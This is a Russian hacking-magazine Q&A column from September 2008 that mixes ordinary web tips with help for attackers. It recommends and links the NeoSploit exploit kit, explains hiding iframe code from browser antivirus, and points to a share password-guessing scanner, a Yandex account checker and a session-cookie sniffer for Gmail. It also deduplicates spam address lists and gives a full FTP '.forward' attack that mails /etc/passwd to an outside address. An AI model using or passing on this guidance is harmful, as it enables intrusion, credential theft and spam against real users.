Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 117, СЕНТЯБРЬ 2008 г.

Hack-FAQ

Маг (icq 884888)

Q: Не подскажешь, существует ли бесплатный сервис для проверки доступности сайта из разных точек планеты?

A: Такой сервис действительно есть. Называется он HostTracker и расположен по адресу host-tracker.com. К примеру, я им пользовался, когда обновил DNS-записи на своем домене и ждал, соответственно, обновления dns-записей на всех корневых NS-серверах. Назову возможности сервиса:

  • Мониторинг произвольного количества ресурсов;
  • Распределенный мониторинг;
  • Период мониторинга – каждые 1/5/15/30/60 минут;
  • Возможность мониторинга работы CGI-скриптов;
  • Поддерживаются HTTP-методы HEAD/POST/GET;
  • Возможность задавать передаваемые CGI-скрипту параметры;
  • Контроль наличия нужных ключевых слов на странице;
  • Возможность задания ключевых слов с помощью регулярных выражений;
  • Возможность задания произвольного количества адресов для уведомления о сбоях сервера;
  • Накопление статистики и дальнейшее формирование отчетов;
  • Возможность открыть отчеты по одному или нескольким ресурсам для свободного доступа;
  • Хранение отчетов без ограничения во времени;
  • Возможность настройки автоматической отсылки выбранных отчетов (ежедневных, еженедельных, месячных, квартальных, годовых) на ваш электронный адрес;
  • Привязка к вашей временной зоне;
  • Детализация отчетов с точностью до дней;
  • Возможность хранения протоколов проверки;
  • Возможность отсылки сообщений о сбоях как на электронный адрес, так и на мобильный телефон, с помощью SMS-сообщений;
  • Моментальная проверка доступности ресурса.

Q: Как сохранить на жесткий диск онлайн-видео с YouTube, Вконтакте и пр.?

A: Для этих целей я обычно использую программу WM Recorder PRO (www.wmrecorder.com/wm_recorder_pro.php).
В ее состав входят несколько утилит для записи потокового аудио и видео в форматах Windows Media (WM Recorder) и Real (RM Recorder), а также программа для записи телевизионных трансляций в интернете (WM VCR). В утилите есть встроенный планировщик, предусмотрена многопотоковая закачка.
Пользоваться WM Recorder PRO очень просто:

  1. Включай программу;
  2. Открой сайт, где лежит нужное тебе видео и запусти его;
  3. Программа начинает захват;
  4. По окончании проигрывания видеоролика программа сохранит его в свой каталог.

PS: Демо-версия поддерживает видеозахват лишь нескольких минут записи, но ничто не мешает тебе использовать встроенную докачку (либо найти лекарство, коих в интернете очень много).

Q: Занимаюсь сплогами. В дизайне и оформлении не очень силен. Подскажи, где бы проверить синтаксис моих страниц на соответствие стандартам w3c?

A: В твоем вопросе уже кроется ответ! Конечно, на validator.w3.org. Сервис проверит твою страницу на соответствие DTD (официальное описание синтаксиса языка разметки) и укажет на все возможные ошибки. Особенно полезным сервис будет, если ты строишь wap 1.1-1.3- или wap 2.0-странички (браузеры мобильных телефонов очень привередливы к незакрытым тегам и т.д.).

Также посоветую другие сервисы-валидаторы W3-консорциума, расположенные по адресу http://www.w3.org/QA/Tools:

  1. Link Checker - проверка битых ссылок на странице (полезно SEOшникам);
  2. CSS Validator - проверка на валидность CSS-стилей документа;
  3. Feed Validator - проверка RSS и ATOM лент новостей (пригодится сплоггерам).

Q: Подскажи, где взять хорошую паблик-связку эксплойтов?

A: Из недавно появившихся в паблике приватных связок мне больше всего нравится NeoSploit 2.x (https://forum.zloy.org/showpost.php?p=530807&postcount=270). Приведу часть ее описания:

  1. Перед выдачей сплоита анализируется версия оси, браузера и другого постороннего софта на машине юзера.
  2. Сплоиты шифруются в реальном времени уникальным ключом.
  3. Защита екзешника от повторной закачки на 1 час.
  4. Есть линк для маяков лоадера и линк необходимый самому лоадеру для слива ехе.
  5. Имеется «статса» по осям, браузерам, странам, реферерам, последним 100 заходам/загрузкам.
  6. Уникальность загрузок смотрится по ip, с которого был слит ехе.
  7. Мультиюзерность.
  8. Пробивает IE и Firefox всех версий.

PS: Раньше связка стоила от $1.5k до $3.0k в зависимости от конфигурации. Пользуйся, но помни об ответственности!

Q: Как бы мне похитрей зашифровать код своего iframe?

A: Сервис, расположенный по адресу k0d.biz/t/htmlcrypt/htmlcrypt_light.php, поможет тебе перевести любой твой html-код в нечитабельное состояние. Например, ты вбиваешь в окно «<b>My html code here</b>» и получаешь на выходе <script language='JavaScript'>document.write(unescape('x3Cx62x3Ex4Dx79x20x68x74x6Dx6Cx20x63x6Fx64x65x20x68x65x72x65x3Cx2Fx62x3Ex20'))</script>.
Это поможет для обхода некоторых проактивных защит, а также встроенной антивирусной защиты всех браузеров. Могу посоветовать и более сложный онлайн-сервис http://ness-team.ru/index/0-8. Тут ты найдешь несколько уровней кодировки html-кода, а также javascript-компрессор, который позволяет убирать лишние символы из исходника и различными хитрыми способами уменьшать его размер. Также компрессор поддерживает обфускацию кода.

Q: Как проще всего искать расшаренные ресурсы в сетке?

A: В этом нелегком деле тебе поможет старый добрый xSharez 3.0.0.9 Professional (www.web-hack.ru/download/download.php?go=110). Это довольно известный и популярный сканер расшаренных ресурсов отечественного производства. В программу встроен подборщик паролей к шарам. При сканировании xSharez выводит много полезной информации: имя рабочей группы, ОС, сетевое имя и MAK-адрес. Программа имеет приятный интерфейс, а после сканирования может сохранять логи.

PS: Сканеры для любых ситуации можно скачать здесь www.web-hack.ru/download/?case=1 (либо взять с нашего диска, – прим. Forb).

Q: Занимаюсь спамом. Как мне удалить из списка мыльников одинаковые адреса?

A: Спамить нехорошо и незаконно! Но, если ты готов рисковать, то тебе поможет следующий php-скрипт:

<?php
$file = file('emails.txt');
$file = array_unique($file);
$fp = fopen('emails.txt', 'w');
fwrite($fp, implode("n", $file));
fclose($fp);
?>

А вообще, есть большое количество программ для отсеивания дубликатов. Тот же самый Microsoft Excel. Советую юзать поиск :).

Q: Существует ли универсальная программа для имитации действий пользователя в браузере?

A: Старый добрый античат по адресу old.antichat.ru/inetcrack предоставляет тебе такую программу. Утилита называется InetCrack и предназначена для отправки на сервер HTTP-пакетов и получения ответа сервера. Исходный HTTP-пакет задается в текстовом виде. Программа позволяет вводить произвольные значения практически всех параметров запроса. Поддерживаются команды GET и POST. Команда POST поддерживает любые MIME-форматы передаваемых данных. Программа позволяет задавать или модифицировать следующие параметры запроса: URL, Referer, Host, Content-Type, Accept-Encoding, User-Agent, Cookie, Authorization, X-Forwarded-Fornew, Vianew, Cache-Controlnew. Также есть кодер/декодер для корректного кодирования и расшифровки данных в URL-формате.
Ответ сервера отображается в текстовом виде, что позволяет видеть исходные тексты HTML и JavаScript. Динамическое отображение поступающих данных от сервера позволяет отслеживать получаемую информацию от CGI-скриптов, работающих в так называемом stream-режиме.

PS: Еще существует неплохой плагин для ОгнеЛиса – LiveHTTPHeaders. Он снифает пакеты, которые затем можно редактировать и слать серверу. Скачай плагин по адресу: livehttpheaders.mozdev.org.

Q: Подскажи, где взять чекер аккаунтов Яндекса?

A: Тут лежит неплохой чекер: myiworm.com/public/tools/yach-0.5.zip Yach 0.5. Из возможностей тулзы:

  • Проверка валидности связок login;pass из текстового файла;
  • Вывод полученной инфы в текстовый файл;
  • Проверка на наличие Яндекс.Денег и их количества.

Q: От чего зависит Business Level (BL) в моем WebMoney-кошельке?

A: Вот официальная выдержка по поводу BL с сайта вебмани: «Параметр Бизнес уровень [BUSINESS LEVEL (BL)] – это публичная характеристика уровня деловой активности пользователя (WMID), вычисляемая системой на основе данных о продолжительности активного использования системы Webmoney Transfer, количестве корреспондентов, с которыми у пользователя имелись трансакции, объеме проведенных трансакций, отсутствии или наличии претензий к пользователю со стороны системы. Представляет собой целое положительное число в диапазоне от 0 до 10000. Параметр BL обновляется каждые 3 часа. BL не зависит от типа аттестата».

Q: Как бы мне, имея FTP-доступ к серверу, прочитать /etc/passwd?

A: Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера:

bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker@mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready
Name (victim.com:hacker):ftp
331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/ls'.(192.168.1.1, 2335) (0 bytes)
total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp@victim.com

В итоге, когда почту отошлют юзеру ftp, выполнится .forward-файл. Если у демона будет достаточно прав для чтения /etc/passwd, то его содержимое придет к тебе на мыло.

Q: Как перенести всю почту на новый Gmail-аккаунт со старого ящика?

A: Для этого понадобится внутренняя Gmail-утилита – Mail Fetcher. Алгоритм действия по шагам следующий:

  • Первым делом заходим в старый аккаунт и в настройках выбираем вкладку «Пересылка», в которой находятся настройки для POP/IMAP. Нам нужно активировать опцию «Включить POP для всех писем (POP for all mail)» и сохранить изменения. После этого в том же разделе «POP-загрузка» (POP Download) появится отметка о том, что POP включен.
  • Теперь заходим в настройки уже нового ящика, где выбираем вкладку Аккаунты (Accounts). Далее, в разделе «Получение почты из других аккаунтов» (Get mail from other accounts), кликаем по ссылке «Добавить другой адрес электронной почты (Add another mail account)» и вводим нужный адрес.

Придется немного подождать, пока Gmail переместить каждое письмо по POP3.

Q: Что такое трехмерный штрихкод?

A: В привычном понимании, штрихкод – это последовательность черных и белых полос, представляющих информацию в том виде, который удобен для считывания техническими средствами. Трехмерный штрихкод, матричный или QR-код – дальнейшее развитие этой технологии. Можно прямо в штрихкод записать некоторую, невидимую для глаза информацию. Ее легко будет расшифровать прямо на экране ноутбука или даже телефона (предварительно сфотографировав), используя несложные программы-декодеры.

К примеру, в QR-коде может быть зашифрован URL сайта или адрес. В отличие от обычного штрихкода, где информацию несет только порядок черточек в горизонтальном направлении, QR использует для кодирования данных одновременно вертикальное и горизонтальное направления. Поэтому на той же самой площади уместится значительно больше информации. Расшифровывать код можно в любом из направлений, часто – даже при поврежденном изображении. В рекламных целях технология успешно применяется в Японии и Америке. Компания, к примеру, кодирует свой URL-адрес и помещает в рекламу, стенды и т.д. Людям достаточно сфотографировать изображение, расшифровать специальной программой и тут же перейти на сайт прямо со своего телефона.

Если хочешь зашифровать свой текст в QR-код, можешь воспользоваться бесплатным генератором – http://qrcode.kaywa.com. А чтобы расшифровать, – подойдет небольшая тулза (http://www.intelcom.ru/2d/english/demo.php) для компьютера или Java-апплет для телефона (http://mobilecodes.nokia.com/scan.htm).

Q: Как проще всего организовать несколько рабочих столов для Windows?

A: Подходящих утилит сейчас пруд пруди. Но я настоятельно рекомендую недавно появившуюся утилиту от Марка Руссиновича, известного специалиста по внутреннему устройству Windows. Приложение весит всего 62 Кб и доступно для закачки с сайта Microsoft: technet.microsoft.com/en-us/sysinternals/cc817881.aspx.

Q: Как взломать аккаунт на Gmail?

A: Большая проблема Gmail'а в том, что после аутентификации, во время которой используется SSL, весь трафик начинается передаваться по обычному HTTP-каналу. Это не могло остаться безнаказанным. На недавно прошедшей хакерской конференции Defcon была представлена х-тулза The Middler для автоматического сбора аккаунтов у пользователей Gmail, которые в своем профиле не включили использование защищенного соединения на протяжении всей работы («Always use https»).Замечу, что подобная опция появилась совсем недавно.

По сути, это обычный снифер, но написанный на Ruby (исходники открыты) и специально заточенный для перехвата пользовательских кукисов. Естественно, Gmail – не единственное поле для деятельности. Чуть ли не каждый второй сервис (взять тот же LiveJournal) действует по похожей схеме, и после авторизации с использованием HTTPS-шифрования начинает передавать информацию в открытом виде. После получения session ID можно проникнуть в аккаунт даже без знания пароля. The Middler уже сейчас умеет следующее:

  • клонировать user-сесии в любом приложении, которое использует передачу данных по HTTP;
  • заменять ссылки с использованием безопасного HTTPS на HTTP;
  • автоматически пересылать браузер жертвы на сайт эксплоитами (на Metasploit), выполняющимися на стороне клиента;
  • автоматически собирать и менять всю приватную информацию о жертве.

В общем, страшное оружие.

Содержание
ttfb: 20.272970199585 ms